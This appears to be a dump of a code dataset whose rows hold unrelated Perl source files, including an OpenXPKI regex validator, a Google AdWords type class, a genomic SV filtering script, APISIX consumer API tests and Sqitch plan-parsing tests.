hexsha
stringlengths 40
40
| size
int64 3
1.05M
| ext
stringclasses 163
values | lang
stringclasses 53
values | max_stars_repo_path
stringlengths 3
945
| max_stars_repo_name
stringlengths 4
112
| max_stars_repo_head_hexsha
stringlengths 40
78
| max_stars_repo_licenses
listlengths 1
10
| max_stars_count
float64 1
191k
⌀ | max_stars_repo_stars_event_min_datetime
stringlengths 24
24
⌀ | max_stars_repo_stars_event_max_datetime
stringlengths 24
24
⌀ | max_issues_repo_path
stringlengths 3
945
| max_issues_repo_name
stringlengths 4
113
| max_issues_repo_head_hexsha
stringlengths 40
78
| max_issues_repo_licenses
listlengths 1
10
| max_issues_count
float64 1
116k
⌀ | max_issues_repo_issues_event_min_datetime
stringlengths 24
24
⌀ | max_issues_repo_issues_event_max_datetime
stringlengths 24
24
⌀ | max_forks_repo_path
stringlengths 3
945
| max_forks_repo_name
stringlengths 4
113
| max_forks_repo_head_hexsha
stringlengths 40
78
| max_forks_repo_licenses
listlengths 1
10
| max_forks_count
float64 1
105k
⌀ | max_forks_repo_forks_event_min_datetime
stringlengths 24
24
⌀ | max_forks_repo_forks_event_max_datetime
stringlengths 24
24
⌀ | content
stringlengths 3
1.05M
| avg_line_length
float64 1
966k
| max_line_length
int64 1
977k
| alphanum_fraction
float64 0
1
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ed7e5693498fbd8033d2f0f8f03b928506778a21 | 4,517 | pm | Perl | core/server/OpenXPKI/Server/Workflow/Validator/Regex.pm | cwittmer/openxpki | adf205de4b79e896147e1f5572f447c884f36d32 | [
"Apache-2.0"
] | null | null | null | core/server/OpenXPKI/Server/Workflow/Validator/Regex.pm | cwittmer/openxpki | adf205de4b79e896147e1f5572f447c884f36d32 | [
"Apache-2.0"
] | null | null | null | core/server/OpenXPKI/Server/Workflow/Validator/Regex.pm | cwittmer/openxpki | adf205de4b79e896147e1f5572f447c884f36d32 | [
"Apache-2.0"
] | 1 | 2019-10-04T16:01:45.000Z | 2019-10-04T16:01:45.000Z | package OpenXPKI::Server::Workflow::Validator::Regex;
use strict;
use warnings;
use base qw( Workflow::Validator );
use OpenXPKI::Debug;
use Data::Dumper;
use OpenXPKI::Server::Context qw( CTX );
use Workflow::Exception qw( validation_error );
use OpenXPKI::Serialization::Simple;
__PACKAGE__->mk_accessors(qw(regex error modifier));
sub _init {
my ( $self, $params ) = @_;
$self->regex( $params->{regex} ) if ($params->{regex});
# Default modifier is /xi
$self->modifier( $params->{modifier} ? $params->{modifier} : 'xi') ;
$self->error( 'I18N_OPENXPKI_UI_VALIDATOR_REGEX_FAILED' );
$self->error( $params->{error} ) if ($params->{error});
}
sub validate {
my ( $self, $wf, $value, $regex, $modifier ) = @_;
##! 1: 'start'
if (!defined $value || $value eq '') {
CTX('log')->log(
MESSAGE => "Regex validator skipped - value is empty",
PRIORITY => 'info',
FACILITY => 'application',
);
return 1;
}
$regex = $self->regex() unless($regex);
$modifier = $self->modifier() unless($modifier);
##! 16: 'Value ' . Dumper $value
##! 16: 'Regex ' . $regex
# replace named regexes
if ($regex eq 'email') {
$regex = qr/ \A [a-z0-9\.-]+\@([\w_-]+\.)+(\w+) \z /xi;
} elsif ($regex eq 'fqdn') {
$regex = qr/ \A (([\w\-]+\.)+)[\w\-]{2,} \z /xi;
# or quote the string if no named match
} else {
# Extended Pattern notation, see http://perldoc.perl.org/perlre.html#Extended-Patterns
$modifier =~ s/\s//g;
if ($modifier =~ /[^alupimsx]/ ) {
OpenXPKI::Exception->throw(
message => "I18N_OPENXPKI_VALIDATOR_REGEX_INVALID_MODIFIER",
params => {
MODIFIER => $modifier,
},
);
}
$modifier = "(?$modifier)" if ($modifier);
$regex = m{$modifier$regex};
}
# Array Magic
my @errors;
##! 32: 'ref of value ' . ref $value
if (ref $value eq 'ARRAY' || $value =~ /^ARRAY/) {
##! 8: 'Array mode'
if (!ref $value) {
$value = OpenXPKI::Serialization::Simple->new()->deserialize( $value );
}
foreach my $val (@{$value}) {
# skip empty
next if (!defined $val || $val eq '');
##! 8: 'Failed on ' . $val
push @errors, $val if ($val !~ $regex);
}
} else {
##! 8: 'scalar mode'
push @errors, $value if ($value !~ $regex);
}
if (@errors) {
# Need to implement this in New UI first
#$wf->context()->param( '__error' => [ $self->error(), { FIELD => $field, VALUES => \@errors }]);
##! 32: 'Regex errors with regex ' . $regex. ', values ' . Dumper \@errors
CTX('log')->log(
MESSAGE => "Regex validator failed on regex $regex",
PRIORITY => 'error',
FACILITY => 'application',
);
my @fields_with_error = ({ name => 'link', error => $self->error() });
validation_error( $self->error(), { invalid_fields => \@fields_with_error } );
return 0;
}
return 1;
}
1;
=head1 NAME
OpenXPKI::Server::Workflow::Validator::Regex
=head1 SYNOPSIS
class: OpenXPKI::Server::Workflow::Validator::Regex
arg:
- $link
param:
regex: "\\A http(s)?://[a-zA-Z0-9-\\.]+"
modifier: xi
error: Please provide a well-formed URL starting with http://
=head1 DESCRIPTION
Validates the context value referenced by argument against a regex. The regex
can be passed either as second argument or specified in the param section.
The value given as argument is always preferred.
class: OpenXPKI::Server::Workflow::Validator::Regex
arg:
- $link
- email
The error parameter is optional, if set this is shown in the UI if the validator
fails instead of the default message.
The regex must be given as pattern without delimiters and modifiers. The
default modifier is "xi" (case-insensitive, whitespace pattern), you can
override it using the key "modifier" in the param section. (@see
http://perldoc.perl.org/perlre.html#Modifiers).
Some common formats can also be referenced by name:
=over
=item email
Basic check for valid email syntax
=item fqdn
A fully qualified domain name, must have at least one dot, all "word"
characters are accepted for the domain parts. Last domain part must have
at least two characters
=back
| 29.141935 | 105 | 0.572725 |
eda86af3cf8702edf0dfc65f59d3ceae02b2e6a6 | 1,677 | pm | Perl | lib/Google/Ads/AdWords/v201406/FeedItemCampaignTargeting.pm | gitpan/Google-Ads-AdWords-Client | 44c7408a1b7f8f16b22efa359c037d1f986f04f1 | [
"Apache-2.0"
] | null | null | null | lib/Google/Ads/AdWords/v201406/FeedItemCampaignTargeting.pm | gitpan/Google-Ads-AdWords-Client | 44c7408a1b7f8f16b22efa359c037d1f986f04f1 | [
"Apache-2.0"
] | null | null | null | lib/Google/Ads/AdWords/v201406/FeedItemCampaignTargeting.pm | gitpan/Google-Ads-AdWords-Client | 44c7408a1b7f8f16b22efa359c037d1f986f04f1 | [
"Apache-2.0"
] | null | null | null | package Google::Ads::AdWords::v201406::FeedItemCampaignTargeting;
use strict;
use warnings;
__PACKAGE__->_set_element_form_qualified(1);
sub get_xmlns { 'https://adwords.google.com/api/adwords/cm/v201406' };
our $XML_ATTRIBUTE_CLASS;
undef $XML_ATTRIBUTE_CLASS;
sub __get_attr_class {
return $XML_ATTRIBUTE_CLASS;
}
use Class::Std::Fast::Storable constructor => 'none';
use base qw(Google::Ads::SOAP::Typelib::ComplexType);
{ # BLOCK to scope variables
my %TargetingCampaignId_of :ATTR(:get<TargetingCampaignId>);
__PACKAGE__->_factory(
[ qw( TargetingCampaignId
) ],
{
'TargetingCampaignId' => \%TargetingCampaignId_of,
},
{
'TargetingCampaignId' => 'SOAP::WSDL::XSD::Typelib::Builtin::long',
},
{
'TargetingCampaignId' => 'TargetingCampaignId',
}
);
} # end BLOCK
1;
=pod
=head1 NAME
Google::Ads::AdWords::v201406::FeedItemCampaignTargeting
=head1 DESCRIPTION
Perl data type class for the XML Schema defined complexType
FeedItemCampaignTargeting from the namespace https://adwords.google.com/api/adwords/cm/v201406.
Specifies the campaign the request context must match in order for the feed item to be considered eligible for serving (aka the targeted campaign). E.g., if the below campaign targeting is set to campaignId = X, then the feed item can only serve under campaign X.
=head2 PROPERTIES
The following properties may be accessed using get_PROPERTY / set_PROPERTY
methods:
=over
=item * TargetingCampaignId
=back
=head1 METHODS
=head2 new
Constructor. The following data structure may be passed to new():
=head1 AUTHOR
Generated by SOAP::WSDL
=cut
| 16.939394 | 264 | 0.726893 |
ed7a3e228e29c32ac3ee2f97231285d66a882a24 | 5,701 | pl | Perl | avva_filter.pl | jeff-sc-chu/AVVA | 9ea97a0d2ba6c814b49dda963cbe65d021eadcda | [
"MIT"
] | null | null | null | avva_filter.pl | jeff-sc-chu/AVVA | 9ea97a0d2ba6c814b49dda963cbe65d021eadcda | [
"MIT"
] | null | null | null | avva_filter.pl | jeff-sc-chu/AVVA | 9ea97a0d2ba6c814b49dda963cbe65d021eadcda | [
"MIT"
] | null | null | null | use strict;
use Getopt::Std;
sub help_mess{
print "\n", "Filter SV events from AVVA", "\n";
print "\n";
print "\t", "-T <Int>", "\t", "Task: ", "\n";
print "\t", "", "\t", "FilterRefContig:\tFilter restuls of Categorize with a reference event set", "\n";
print "\t", "", "\t", "FilterGap:\tFilter events bordering gaps", "\n";
print "\t", "", "\t", "FilterVCF:\tFilter with a Illumina/PacBio Call set", "\n";
print "\t", "-i <File>", "\t", "Output file from avva.pl to be filtered", "\n";
print "\t", "-j <File>", "\t", "Output file from avva.pl to be used a reference", "\n";
print "\t", "-g <File>", "\t", "GapInfo file", "\n";
print "\t", "-k [Bool]", "\t", "Keep filtered results (1) or remove filtered results (default, or 0).", "\n";
print "\t", "-h [Bool]", "\t", "Help. Show this and exits.", "\n";
}
## ARGS #############
my %options;
my $arguments = 'i:o:T:r:j:e:g:c:k8hp';
getopts($arguments, \%options);
my $_input = $options{'i'};
my $_output = $options{'o'};
my $_tasks = $options{'T'};
my $_debug = $options{'8'};
my $_help = $options{'h'};
my $_refFile = $options{'j'};
my $_gapInfoFile = $options{'g'};
my $_keepFilter = $options{'k'};
%options = ();
if($_help){
help_mess();
exit;
}
if(!$_output){
open OUT, ">&STDOUT";
}
else{
open OUT, "+>$_output";
}
die "Error: Required input (-i) missing.\n" if(!$_input);
## Globals #############
my %gap;
my %ref;
## Main #############
if($_tasks eq 'FilterRefContig'){
die "Error: Required ref set (-j) missing.\n" if(!$_refFile);
FilterRefContig();
}
elsif($_tasks eq 'FilterGap'){
if(!$_gapInfoFile){
help_mess();
print STDERR "Error: Required GapInfo file (-g) missing.\n";
exit;
}
populateGap();
FilterGap();
}
elsif($_tasks eq 'FilterVCF'){
die "Error: Required VCF input (-j) missing.\n" if(!$_refFile);
populateVCF();
FilterVCF();
}
else{
help_mess();
print STDERR "Error: Unknown Task.\n";
exit;
}
## Subroutines
sub FilterVCF{
open IN, $_input;
while(my $line = <IN>){
chomp $line;
my @info = split /\t/, $line;
my ($category, $eventPosLine) = ($info[1], $info[4]);
#my ($contig, $category, $eventCount, $events, $eventPosLine) = split /\t/, $line;
next if($category eq 'Contiguous');
my $support = '';
my @eventPos = split /;/, $eventPosLine;
foreach my $eventPos(@eventPos){
my $supportStatus = 0;
my ($chr1, $pos1, $chr2, $pos2) = $eventPos =~ /(\S+):(\d+)-(\S+):(\d+)/;
for(my $i = $pos1-1000; $i <= $pos1+1000; $i++){
if($ref{$chr1}{$i}){
$support .= 'S';
$supportStatus = 1;
last;
}
}
if(!$supportStatus){
for(my $i = $pos2-1000; $i <= $pos2+1000; $i++){
if($ref{$chr2}{$i}){
$support .= 'S';
$supportStatus = 1;
last;
}
}
}
if(!$supportStatus){
$support .= 'x';
}
=cut
if($ref{$chr1}{$pos1} || $ref{$chr2}{$pos2}){
$support .= 'S';
}
else{
$support .= 'x';
}
=cut
}
if($_keepFilter){
print $line, "\t", $support, "\n";
}
else{
print $line, "\t", $support, "\n" if $support =~ /x/;
}
}
close IN;
}
sub FilterGap{
open IN, $_input;
while(my $line = <IN>){
chomp $line;
my ($contig, $category, $eventCount, $events, $eventPosLine) = split /\t/, $line;
next if($category eq 'Contiguous');
my $borderGap = '';
my @eventPos = split /;/, $eventPosLine;
foreach my $eventPos(@eventPos){
my ($chr1, $pos1, $chr2, $pos2) = $eventPos =~ /(\S+):(\d+)-(\S+):(\d+)/;
if($gap{$chr1}{$pos1} || $gap{$chr2}{$pos2}){
$borderGap .= 'G';
}
else{
$borderGap .= 'n';
}
}
print $line, "\t$borderGap\n" if $borderGap =~ /n/;
}
close IN;
}
sub FilterRefContig{
my %ref;
open REF, $_refFile;
while(my $line = <REF>){
chomp $line;
my ($contig, $category, $eventCount, $events, $eventPosLine) = split /\t/, $line;
next if($category eq 'Contiguous');
my @eventPos = split /;/, $eventPosLine;
foreach my $eventPos(@eventPos){
my ($chr1, $pos1, $chr2, $pos2) = $eventPos =~ /(\S+):(\d+)-(\S+):(\d+)/;
for(my $i = $pos1 - 1000; $i < $pos1 + 1000; $i++){
$ref{$chr1}{$i} = 1;
}
for(my $i = $pos2 - 1000; $i < $pos2 + 1000; $i++){
$ref{$chr2}{$i} = 1;
}
}
}
close REF;
open IN, $_input;
while(my $line = <IN>){
chomp $line;
my $control;
my ($contig, $category, $eventCount, $events, $eventPosLine) = split /\t/, $line;
next if($category eq 'Contiguous');
my @eventPos = split /;/, $eventPosLine;
foreach my $eventPos(@eventPos){
my ($chr1, $pos1, $chr2, $pos2) = $eventPos =~ /(\S+):(\d+)-(\S+):(\d+)/;
if($ref{$chr1}{$pos1} || $ref{$chr2}{$pos2}){
$control .= 'C';
}
else{
$control .= 'n';
}
}
print $line, "\t", $control, "\n" if $control =~ /n/;
}
close IN;
}
sub populateGap{
open GAP, $_gapInfoFile;
while(my $line = <GAP>){
chomp $line;
my ($chrom, $gapS, $gapE) = $line =~ /^(\S+):(\d+)-(\d+)/;
for(my $i = $gapS - 50; $i <= $gapS; $i++){
$gap{$chrom}{$i} = 1;
}
for(my $i = $gapE; $i <= $gapE + 50; $i++){
$gap{$chrom}{$i} = 1;
}
}
close GAP;
}
sub populateVCF{
open REF, $_refFile;
while(my $line = <REF>){
chomp $line;
next if($line =~ /^#/);
my @info = split /\t/, $line;
my ($svType) = $line =~ /SVTYPE=(.*?);/;
my ($end) = $line =~ /END=(\d+)/;
$end = 0 if !$end;
my $endChr = $info[0];
if($svType eq "BND"){
($endChr, $end) = $info[4] =~ /(Chrom\d+):(\d+)/;
}
$ref{$info[0]}{$info[1]} = 1;
if($end){
$ref{$endChr}{$end} = 1;
}
}
close REF;
}
| 25.68018 | 111 | 0.512366 |
eda7671934ee4a435a508822c45dd0b4a0257d62 | 3,370 | t | Perl | t/admin/consumers2.t | syzh/apisix | c8d35cd73c1c02b7c5f98f14042f9467f40a632f | [
"Apache-2.0"
] | null | null | null | t/admin/consumers2.t | syzh/apisix | c8d35cd73c1c02b7c5f98f14042f9467f40a632f | [
"Apache-2.0"
] | 2 | 2022-02-28T01:28:56.000Z | 2022-03-01T01:47:55.000Z | t/admin/consumers2.t | wfgydbu/apisix | e02baebbef0268114d93474e41b1e7ed7f59e957 | [
"Apache-2.0"
] | null | null | null | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
use t::APISIX 'no_plan';
repeat_each(1);
no_long_string();
no_root_location();
no_shuffle();
log_level("info");
add_block_preprocessor(sub {
my ($block) = @_;
if (!$block->request) {
$block->set_value("request", "GET /t");
}
if (!$block->no_error_log) {
$block->set_value("no_error_log", "[error]\n[alert]");
}
});
run_tests;
__DATA__
=== TEST 1: not unwanted data, PUT
--- config
location /t {
content_by_lua_block {
local json = require("toolkit.json")
local t = require("lib.test_admin").test
local code, message, res = t('/apisix/admin/consumers',
ngx.HTTP_PUT,
[[{
"username":"jack"
}]]
)
if code >= 300 then
ngx.status = code
ngx.say(message)
return
end
res = json.decode(res)
res.node.value.create_time = nil
res.node.value.update_time = nil
ngx.say(json.encode(res))
}
}
--- response_body
{"action":"set","node":{"key":"/apisix/consumers/jack","value":{"username":"jack"}}}
=== TEST 2: not unwanted data, GET
--- config
location /t {
content_by_lua_block {
local json = require("toolkit.json")
local t = require("lib.test_admin").test
local code, message, res = t('/apisix/admin/consumers/jack',
ngx.HTTP_GET
)
if code >= 300 then
ngx.status = code
ngx.say(message)
return
end
res = json.decode(res)
res.node.value.create_time = nil
res.node.value.update_time = nil
ngx.say(json.encode(res))
}
}
--- response_body
{"action":"get","count":"1","node":{"key":"/apisix/consumers/jack","value":{"username":"jack"}}}
=== TEST 3: not unwanted data, DELETE
--- config
location /t {
content_by_lua_block {
local json = require("toolkit.json")
local t = require("lib.test_admin").test
local code, message, res = t('/apisix/admin/consumers/jack',
ngx.HTTP_DELETE
)
if code >= 300 then
ngx.status = code
ngx.say(message)
return
end
res = json.decode(res)
ngx.say(json.encode(res))
}
}
--- response_body
{"action":"delete","deleted":"1","key":"/apisix/consumers/jack","node":{}}
| 27.398374 | 96 | 0.565579 |
ed9983922e6ecf3c3d0597880d2cb257967c111c | 80,179 | t | Perl | t/plan.t | AndreSteenveld/sqitch | a2c920545cdba64367c88b77a6268b0fc503f0d3 | [
"MIT"
] | null | null | null | t/plan.t | AndreSteenveld/sqitch | a2c920545cdba64367c88b77a6268b0fc503f0d3 | [
"MIT"
] | null | null | null | t/plan.t | AndreSteenveld/sqitch | a2c920545cdba64367c88b77a6268b0fc503f0d3 | [
"MIT"
] | 1 | 2021-09-27T15:57:36.000Z | 2021-09-27T15:57:36.000Z | #!/usr/bin/perl -w
use strict;
use warnings;
use 5.010;
use utf8;
use Test::More;
use App::Sqitch;
use App::Sqitch::Target;
use Locale::TextDomain qw(App-Sqitch);
use Path::Class;
use Test::Exception;
use Test::File;
use Test::Deep;
use Test::File::Contents;
use Encode;
#use Test::NoWarnings;
use File::Path qw(make_path remove_tree);
use App::Sqitch::DateTime;
use lib 't/lib';
use MockOutput;
use TestConfig;
my $CLASS;
BEGIN {
$CLASS = 'App::Sqitch::Plan';
use_ok $CLASS or die;
}
can_ok $CLASS, qw(
sqitch
target
file
changes
position
load
syntax_version
project
uri
_parse
check_changes
open_script
);
my $config = TestConfig->new('core.engine' => 'sqlite');
my $sqitch = App::Sqitch->new( config => $config );
my $target = App::Sqitch::Target->new( sqitch => $sqitch );
isa_ok my $plan = App::Sqitch::Plan->new(sqitch => $sqitch, target => $target),
$CLASS;
is $plan->file, $target->plan_file, 'File should be coopied from Target';
# Set up some some utility functions for creating changes.
sub blank {
App::Sqitch::Plan::Blank->new(
plan => $plan,
lspace => $_[0] // '',
note => $_[1] // '',
);
}
my $prev_tag;
my $prev_change;
my %seen;
sub clear {
undef $prev_tag;
undef $prev_change;
%seen = ();
return ();
}
my $ts = App::Sqitch::DateTime->new(
year => 2012,
month => 7,
day => 16,
hour => 17,
minute => 25,
second => 7,
time_zone => 'UTC',
);
sub ts($) {
my $str = shift || return $ts;
my @parts = split /[-:T]/ => $str;
return App::Sqitch::DateTime->new(
year => $parts[0],
month => $parts[1],
day => $parts[2],
hour => $parts[3],
minute => $parts[4],
second => $parts[5],
time_zone => 'UTC',
);
}
my $vivify = 0;
my $project;
sub dep($) {
App::Sqitch::Plan::Depend->new(
plan => $plan,
(defined $project ? (project => $project) : ()),
%{ App::Sqitch::Plan::Depend->parse(shift) },
)
}
sub change($) {
my $p = shift;
if ( my $op = delete $p->{op} ) {
@{ $p }{ qw(lopspace operator ropspace) } = split /([+-])/, $op;
$p->{$_} //= '' for qw(lopspace ropspace);
}
$p->{requires} = [ map { dep $_ } @{ $p->{requires} } ]
if $p->{requires};
$p->{conflicts} = [ map { dep "!$_" } @{ $p->{conflicts} }]
if $p->{conflicts};
$prev_change = App::Sqitch::Plan::Change->new(
plan => $plan,
timestamp => ts delete $p->{ts},
planner_name => 'Barack Obama',
planner_email => 'potus@whitehouse.gov',
( $prev_tag ? ( since_tag => $prev_tag ) : () ),
( $prev_change ? ( parent => $prev_change ) : () ),
%{ $p },
);
if (my $duped = $seen{ $p->{name} }) {
$duped->add_rework_tags(map { $seen{$_}-> tags } @{ $p->{rtag} });
}
$seen{ $p->{name} } = $prev_change;
if ($vivify) {
$prev_change->id;
$prev_change->tags;
}
return $prev_change;
}
sub tag($) {
my $p = shift;
my $ret = delete $p->{ret};
$prev_tag = App::Sqitch::Plan::Tag->new(
plan => $plan,
change => $prev_change,
timestamp => ts delete $p->{ts},
planner_name => 'Barack Obama',
planner_email => 'potus@whitehouse.gov',
%{ $p },
);
$prev_change->add_tag($prev_tag);
$prev_tag->id, if $vivify;
return $ret ? $prev_tag : ();
}
sub prag {
App::Sqitch::Plan::Pragma->new(
plan => $plan,
lspace => $_[0] // '',
hspace => $_[1] // '',
name => $_[2],
(defined $_[3] ? (lopspace => $_[3]) : ()),
(defined $_[4] ? (operator => $_[4]) : ()),
(defined $_[5] ? (ropspace => $_[5]) : ()),
(defined $_[6] ? (value => $_[6]) : ()),
rspace => $_[7] // '',
note => $_[8] // '',
);
}
my $mocker = Test::MockModule->new($CLASS);
# Do no sorting for now.
my $sorted = 0;
sub sorted () {
my $ret = $sorted;
$sorted = 0;
return $ret;
}
$mocker->mock(check_changes => sub { $sorted++; shift, shift, shift; @_ });
sub version () {
prag(
'', '', 'syntax-version', '', '=', '', App::Sqitch::Plan::SYNTAX_VERSION
);
}
##############################################################################
# Test parsing.
my $file = file qw(t plans widgets.plan);
my $fh = $file->open('<:utf8_strict');
ok my $parsed = $plan->_parse($file, $fh),
'Should parse simple "widgets.plan"';
is sorted, 1, 'Should have sorted changes';
isa_ok $parsed->{changes}, 'ARRAY', 'changes';
isa_ok $parsed->{lines}, 'ARRAY', 'lines';
cmp_deeply $parsed->{changes}, [
clear,
change { name => 'hey', ts => '2012-07-16T14:01:20' },
change { name => 'you', ts => '2012-07-16T14:01:35' },
tag {
name => 'foo',
note => 'look, a tag!',
ts => '2012-07-16T14:02:05',
rspace => ' '
},
,
], 'All "widgets.plan" changes should be parsed';
cmp_deeply $parsed->{lines}, [
clear,
version,
prag( '', '', 'project', '', '=', '', 'widgets'),
blank('', 'This is a note'),
blank(),
blank(' ', 'And there was a blank line.'),
blank(),
change { name => 'hey', ts => '2012-07-16T14:01:20' },
change { name => 'you', ts => '2012-07-16T14:01:35' },
tag {
ret => 1,
name => 'foo',
note => 'look, a tag!',
ts => '2012-07-16T14:02:05',
rspace => ' '
},
], 'All "widgets.plan" lines should be parsed';
# Plan with multiple tags.
$file = file qw(t plans multi.plan);
$fh = $file->open('<:utf8_strict');
ok $parsed = $plan->_parse($file, $fh),
'Should parse multi-tagged "multi.plan"';
is sorted, 2, 'Should have sorted changes twice';
cmp_deeply delete $parsed->{pragmas}, {
syntax_version => App::Sqitch::Plan::SYNTAX_VERSION,
project => 'multi',
}, 'Should have captured the multi pragmas';
cmp_deeply $parsed, {
changes => [
clear,
change { name => 'hey', planner_name => 'theory', planner_email => 't@heo.ry' },
change { name => 'you', planner_name => 'anna', planner_email => 'a@n.na' },
tag {
name => 'foo',
note => 'look, a tag!',
ts => '2012-07-16T17:24:07',
rspace => ' ',
planner_name => 'julie',
planner_email => 'j@ul.ie',
},
change { name => 'this/rocks', pspace => ' ' },
change { name => 'hey-there', note => 'trailing note!', rspace => ' ' },
tag { name =>, 'bar' },
tag { name => 'baz' },
],
lines => [
clear,
version,
prag( '', '', 'project', '', '=', '', 'multi'),
blank('', 'This is a note'),
blank(),
blank('', 'And there was a blank line.'),
blank(),
change { name => 'hey', planner_name => 'theory', planner_email => 't@heo.ry' },
change { name => 'you', planner_name => 'anna', planner_email => 'a@n.na' },
tag {
ret => 1,
name => 'foo',
note => 'look, a tag!',
ts => '2012-07-16T17:24:07',
rspace => ' ',
planner_name => 'julie',
planner_email => 'j@ul.ie',
},
blank(' '),
change { name => 'this/rocks', pspace => ' ' },
change { name => 'hey-there', note => 'trailing note!', rspace => ' ' },
tag { name =>, 'bar', ret => 1 },
tag { name => 'baz', ret => 1 },
],
}, 'Should have "multi.plan" lines and changes';
# Try a plan with changes appearing without a tag.
$file = file qw(t plans changes-only.plan);
$fh = $file->open('<:utf8_strict');
ok $parsed = $plan->_parse($file, $fh), 'Should read plan with no tags';
is sorted, 1, 'Should have sorted changes';
cmp_deeply delete $parsed->{pragmas}, {
syntax_version => App::Sqitch::Plan::SYNTAX_VERSION,
project => 'changes_only',
}, 'Should have captured the changes-only pragmas';
cmp_deeply $parsed, {
lines => [
clear,
version,
prag( '', '', 'project', '', '=', '', 'changes_only'),
blank('', 'This is a note'),
blank(),
blank('', 'And there was a blank line.'),
blank(),
change { name => 'hey' },
change { name => 'you' },
change { name => 'whatwhatwhat' },
],
changes => [
clear,
change { name => 'hey' },
change { name => 'you' },
change { name => 'whatwhatwhat' },
],
}, 'Should have lines and changes for tagless plan';
# Try plans with DOS line endings.
$file = file qw(t plans dos.plan);
$fh = $file->open('<:utf8_strict');
ok $parsed = $plan->_parse($file, $fh), 'Should read plan with DOS line endings';
is sorted, 1, 'Should have sorted changes';
cmp_deeply delete $parsed->{pragmas}, {
syntax_version => App::Sqitch::Plan::SYNTAX_VERSION,
project => 'dos',
}, 'Should have captured the dos pragmas';
# Try a plan with a bad change name.
$file = file qw(t plans bad-change.plan);
$fh = $file->open('<:utf8_strict');
throws_ok { $plan->_parse($file, $fh) } 'App::Sqitch::X',
'Should die on plan with bad change name';
is $@->ident, 'parse', 'Bad change name error ident should be "parse"';
is $@->message, __x(
'Syntax error in {file} at line {lineno}: {error}',
file => $file,
lineno => 5,
error => __(
qq{Invalid name; names must not begin with punctuation, }
. 'contain "@", ":", "#", or blanks, or end in punctuation or digits following punctuation',
),
), 'And the bad change name error message should be correct';
is sorted, 0, 'Should not have sorted changes';
my @bad_names = (
'^foo', # No leading punctuation
'foo^', # No trailing punctuation
'foo^6', # No trailing punctuation+digit
'foo^666', # No trailing punctuation+digits
'%hi', # No leading punctuation
'hi!', # No trailing punctuation
'foo@bar', # No @ allowed at all
'foo:bar', # No : allowed at all
'+foo', # No leading +
'-foo', # No leading -
'@foo', # No leading @
);
# Try other invalid change and tag name issues.
my $prags = '%syntax-version=' . App::Sqitch::Plan::SYNTAX_VERSION
. "\n%project=test\n\n";
for my $name (@bad_names) {
for my $line ("+$name", "\@$name") {
next if $line eq '%hi'; # This would be a pragma.
my $buf = $prags . $line;
my $what = $line =~ /^[@]/ ? 'tag' : 'change';
my $fh = IO::File->new(\$buf, '<:utf8_strict');
throws_ok { $plan->_parse('baditem', $fh) } 'App::Sqitch::X',
qq{Should die on plan with bad name "$line"};
is $@->ident, 'parse', 'Exception ident should be "parse"';
is $@->message, __x(
'Syntax error in {file} at line {lineno}: {error}',
file => 'baditem',
lineno => 4,
error => __(
qq{Invalid name; names must not begin with punctuation, }
. 'contain "@", ":", "#", or blanks, or end in punctuation or digits following punctuation',
)
), qq{And "$line" should trigger the appropriate message};
is sorted, 0, 'Should not have sorted changes';
}
}
# Try some valid change and tag names.
my $tsnp = '2012-07-16T17:25:07Z Barack Obama <potus@whitehouse.gov>';
my $foo_proj = App::Sqitch::Plan::Pragma->new(
plan => $plan,
name => 'project',
value => 'foo',
operator => '=',
);
for my $name (
'foo', # alpha
'12', # digits
't', # char
'6', # digit
'阱阪阬', # multibyte
'foo/bar', # middle punct
'beta1', # ending digit
'foo_', # ending underscore
'_foo', # leading underscore
'v1.0-1b', # punctuation followed by digit in middle
'v1.2-1', # version number with dash
'v1.2+1', # version number with plus
'v1.2_1', # version number with underscore
) {
# Test a change name.
my $lines = encode_utf8 "\%project=foo\n\n$name $tsnp";
my $fh = IO::File->new(\$lines, '<:utf8_strict');
ok my $parsed = $plan->_parse('ooditem', $fh),
encode_utf8(qq{Should parse "$name"});
cmp_deeply delete $parsed->{pragmas}, {
syntax_version => App::Sqitch::Plan::SYNTAX_VERSION,
project => 'foo',
}, encode_utf8("Should have captured the $name pragmas");
cmp_deeply $parsed, {
changes => [ clear, change { name => $name } ],
lines => [ clear, version, $foo_proj, blank, change { name => $name } ],
}, encode_utf8(qq{Should have pragmas in plan with change "$name"});
# Test a tag name.
my $tag = '@' . $name;
$lines = encode_utf8 "\%project=foo\n\nfoo $tsnp\n$tag $tsnp";
$fh = IO::File->new(\$lines, '<:utf8_strict');
ok $parsed = $plan->_parse('gooditem', $fh),
encode_utf8(qq{Should parse "$tag"});
cmp_deeply delete $parsed->{pragmas}, {
syntax_version => App::Sqitch::Plan::SYNTAX_VERSION,
project => 'foo',
}, encode_utf8(qq{Should have pragmas in plan with tag "$name"});
cmp_deeply $parsed, {
changes => [ clear, change { name => 'foo' }, tag { name => $name } ],
lines => [
clear,
version,
$foo_proj,
blank,
change { name => 'foo' },
tag { name => $name, ret => 1 }
],
}, encode_utf8(qq{Should have line and change for "$tag"});
}
is sorted, 26, 'Should have sorted changes 18 times';
# Try planning with other reserved names.
for my $reserved (qw(HEAD ROOT)) {
my $root = $prags . '@' . $reserved . " $tsnp";
$file = file qw(t plans), "$reserved.plan";
$fh = IO::File->new(\$root, '<:utf8_strict');
throws_ok { $plan->_parse($file, $fh) } 'App::Sqitch::X',
qq{Should die on plan with reserved tag "\@$reserved"};
is $@->ident, 'parse', qq{\@$reserved exception should have ident "plan"};
is $@->message, __x(
'Syntax error in {file} at line {lineno}: {error}',
file => $file,
lineno => 4,
error => __x(
'"{name}" is a reserved name',
name => '@' . $reserved,
),
), qq{And the \@$reserved error message should be correct};
is sorted, 0, "Should have sorted \@$reserved changes nonce";
}
# Try a plan with a change name that looks like a sha1 hash.
my $sha1 = '6c2f28d125aff1deea615f8de774599acf39a7a1';
$file = file qw(t plans sha1.plan);
$fh = IO::File->new(\"$prags$sha1 $tsnp", '<:utf8_strict');
throws_ok { $plan->_parse($file, $fh) } 'App::Sqitch::X',
'Should die on plan with SHA1 change name';
